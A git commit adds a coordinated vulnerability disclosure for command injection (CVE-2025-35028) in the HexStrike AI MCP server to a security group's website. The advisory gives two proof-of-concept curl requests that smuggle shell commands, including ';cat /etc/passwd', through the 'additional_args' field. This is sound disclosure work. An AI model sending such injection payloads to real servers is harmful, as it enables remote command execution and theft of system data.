Add Jippen's MCP thing (#230)

* Add Jippen's MCP thing

Signed-off-by: Tod Beardsley <todb@packetfu.com>

* Correct GCVE link

Signed-off-by: Tod Beardsley <todb@packetfu.com>

---------

Signed-off-by: Tod Beardsley <todb@packetfu.com>

Author: todb

content/cve.md

@@ -211,6 +211,7 @@ When we publish CVEs, we will tend to use this [template], adjusted to taste.
 | ----------------- | --------- | ------------------------------------------   | ---- |
 | [CVE-2025-8452]   | 0x00e2    | **Brother Printer Serial Number Disclosure** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001] |
 | [CVE-2025-35027]  | 0x00e4    | **Unitree Robotics Command Injection**      | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010] |
+| [CVE-2025-35028]  | 0x00e4    | **HexStrike AI MCP Server Command Injection**      |   [GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011] |
 | [CVE-2025-35021]  | 0x00e5  | **Abilis CPX Fallback Shell Connection Relay** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100] |
 </div>
 
@@ -224,7 +225,8 @@ That said, starting in August of 2025, we've started to reserve [GCVEs](https://
 
 | Meeting | GCVE (Reserved) |
 |---------|-----------------|
-| 0x00e4  | GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011 |
+| 0x00xx  | None right now! |
+
 
 </div>
 
@@ -273,7 +275,9 @@ Vulnerabilities involving other parties must be either (1) presented at a regula
 [CVE-2025-35010]: {{< baseurl >}}cves/cve-2025-35010/
 [CVE-2025-8452]: {{< baseurl >}}cves/cve-2025-8452/
 [CVE-2025-35027]: {{< baseurl >}}cves/cve-2025-35027/
+[CVE-2025-35028]: {{< baseurl >}}cves/cve-2025-35028/
 [CVE-2025-35021]: {{< baseurl >}}cves/cve-2025-35021/
 [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001
 [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010
+[GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011]: {{< baseurl >}}gcves/GCVE-1337-2025-0000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011
 [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100

content/cves/CVE-2025-35028.md

@@ -0,0 +1,95 @@
+---
+title: CVE-2025-35028
+aliases:
+  - /cves/CVE-2025-35028.html
+  - /gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011
+publishDate: 2025-11-30T13:37:00-06:00
+---
+# CVE-2025-35028: HexStrike AI MCP Server Comamand Injection
+
+[AHA!] has discovered an issue with HexStrike AI from
+[0x4m4](https://www.0x4m4.com), and is issuing this disclosure in accordance
+with AHA!'s standard [disclosure policy] on November 30, 2025. [CVE-2025-35028]
+has been assigned to this issue. Any questions about this disclosure should be
+directed to cve@takeonme.org.
+
+The [GCVE](https://gcve.eu/about/) identifier for this issue is <span style="white-space: nowrap;">[GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011]</span>
+
+# Executive Summary
+
+[HexStrike AI](https://github.com/0x4m4/hexstrike-ai) is a fairly popular model
+context protocol (MCP) server, having collected about five thousand stars on
+GitHub at the time of this disclosure, and has been forked over a thousand times.
+It is billed as an "AI-Powered MCP Cybersecurity Automation Platform," and is
+likely shipping as part of other AI security products.
+
+By providing a command-line argument starting with a semi-colon `;` to an
+API endpoint created by the `EnhancedCommandExecutor` class of the HexStrike AI MCP
+server, the resultant composed command is executed directly in the context of
+the MCP server's normal privilege; typically, this is `root`. There is no
+attempt to sanitize these arguments in the default configuration of this MCP
+server.
+
+This appears to be an instance of [CWE-78], and has an estimated CVSSv3.1 score
+of *9.1*
+([CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)).
+Note that this CVSS rating presumes the MCP server is run as-is in a default
+state, with no user authentication.
+
+# Technical Details
+
+It is trivial for an attacker to inject additional commands via the
+`EnhancedCommandExecutor` object, near
+https://github.com/0x4m4/hexstrike-ai/blob/master/hexstrike_server.py#L6783.
+
+The below is a straightforward example using a typical `nmap` command exposed by
+`EnhancedCommandExecutor`, tested against commit
+[33267047667b9accfbf0fdac1c1c7ff12f3a5512](https://github.com/0x4m4/hexstrike-ai/commit/33267047667b9accfbf0fdac1c1c7ff12f3a5512)
+the shipping version on September 25, 2025 (this project does not appear to use
+version numbers or tagged releases.)
+
+## Demo 1:
+
+```
+curl -X POST http://localhost:8888/api/tools/nmap \
+  -H "Content-Type: application/json" \
+  -d '{"target": "127.0.0.1", "scan_type": "-sV -Pn", "ports": "443,80,5000", "additional_args": ";echo `whoami`"}'|jq -r '.stdout'
+```
+
+## Demo 2:
+
+```
+curl -X POST http://localhost:8888/api/tools/nmap \
+  -H "Content-Type: application/json" \
+  -d '{"target": "127.0.0.1", "scan_type": "-sV -Pn", "ports": "443,80,5000", "additional_args": ";cat /etc/passwd"}'|jq -r '.stdout'
+```
+
+These demos return the results of the appended commands to the user via stdout.
+
+# Attacker Value
+
+Should this MCP server be bound to a network interface reachable over normal
+TCP/IP, this can lead to a total compromise of the MCP server's environment.
+This is the normal configuration and usage of the
+[hexstrike-ai](https://github.com/0x4m4/hexstrike-ai) MCP project, which, as
+mentioned, is a fairly popular API harness for providing cybersecurity tooling
+for evaluation and penetration testing.
+
+# Credit
+
+This issue was discovered and disclosed by jippen of AHA!.
+
+# Timeline
+
+* 2025-09-25 (Thu): Presented at regularly scheduled AHA! meeting
+* 2025-10-01 (Wed): Disclosed to the vendor at contact@0x4m4.com
+* 2025-11-20 (Thu): Reminder to the vendor of the upcoming disclosure
+* 2025-11-30 (Sun): Public disclosure of [CVE-2025-35028]
+
+----
+
+[AHA!]: https://takeonme.org
+[disclosure policy]: https://takeonme.org/cve.html
+[CVE-2025-35028]: https://www.cve.org/CVERecord?id=CVE-2025-35028
+[CWE-78]: https://cwe.mitre.org/data/definitions/78.html
+[GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011